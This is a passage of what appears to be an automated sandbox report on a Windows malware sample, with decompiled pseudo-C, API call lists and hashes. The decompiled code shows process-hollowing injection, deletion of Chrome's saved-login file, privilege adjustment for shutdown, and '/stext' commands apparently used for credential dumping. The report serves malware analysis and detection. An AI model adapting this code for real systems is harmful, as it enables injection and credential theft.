                                  					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                  					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                  					if( *_t93 != 0x4550) {
                                  						goto L16;
                                  					} else {
                                  						_t95 = 0x11;
                                  						memset(_t115 - 0x60, 0, _t95 << 2);
                                  						_t114 =  *(_t115 + 0x10);
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
                                  							goto L16;
                                  						} else {
                                  							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                  							 *(_t115 - 0x70) = _t110;
                                  							_t110->ContextFlags = 0x10007;
                                  							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
                                  								goto L16;
                                  							} else {
                                  								_t71 =  *(_t115 - 0x1c);
                                  								if(_t71 ==  *(_t93 + 0x34)) {
                                  									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
                                  								}
                                  								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
                                  								 *(_t115 - 0x6c) = _t72;
                                  								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
                                  									goto L16;
                                  								} else {
                                  									_t74 = 0;
                                  									 *(_t115 - 0x64) = 0;
                                  									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                  										_t100 =  *(_t115 + 0xc);
                                  										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                  										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                  										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
                                  										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                  										_t74 =  *(_t115 - 0x64);
                                  									}
                                  									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
                                  										goto L16;
                                  									} else {
                                  										_t80 =  *(_t115 - 0x70);
                                  										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                  										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
                                  											goto L16;
                                  										} else {
                                  											_t60 = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                  				return _t60;
                                   			}

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 0040F21E
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                  • CreateProcessW.KERNEL32 ref: 0040F294
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                  • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                  • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                  • API String ID: 65594003-1050664331
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E0040710F() {
                                  				char _v5;
                                  				char _v6;
                                  				char _v24;
                                  				void* _v40;
                                  				char* _t12;
                                  				CHAR* _t13;
                                  				long _t20;
                                  				char* _t21;
                                  				void* _t25;
                                  
                                  				_t12 = getenv("UserProfile");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                  				_t13 =  &_v24;
                                  				L00414170();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				if(DeleteFileA(_t13) != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                  					E00407A90("\n[Chrome StoredLogins found, cleared!]");
                                  					_t25 = 1;
                                  					L8:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t25;
                                  				}
                                  				_t20 = GetLastError();
                                  				if(_t20 == 0) {
                                  					_t21 =  &_v6;
                                  					L5:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                  					E00407A90("\n[Chrome StoredLogins not found]");
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				if(_t20 == 1) {
                                  					_t21 =  &_v5;
                                  					goto L5;
                                  				}
                                  				_t25 = 0;
                                  				goto L8;
                                   			}

                                  APIs
                                  • getenv.MSVCRT ref: 00407124
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                  • GetLastError.KERNEL32 ref: 0040715F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                  Strings
                                  • [Chrome StoredLogins not found], xrefs: 00407179
                                  • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                  • UserProfile, xrefs: 0040711F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 3740952235-1062637481
                                  • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                  • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0040EC0F() {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				struct _TOKEN_PRIVILEGES _v24;
                                  				signed int _t14;
                                  
                                  				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                  				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                  				_v24.PrivilegeCount = 1;
                                  				_v12 = 2;
                                  				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                  				_t14 = GetLastError();
                                  				asm("sbb eax, eax");
                                  				return  ~( ~_t14);
                                   			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                  • GetLastError.KERNEL32 ref: 0040EC5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                  • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                  • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                  • String ID: /stext "
                                  • API String ID: 1338134179-3856184850
                                  • Opcode ID: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                  • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                  • Opcode Fuzzy Hash: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                  • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • wcslen.MSVCRT ref: 00407E46
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
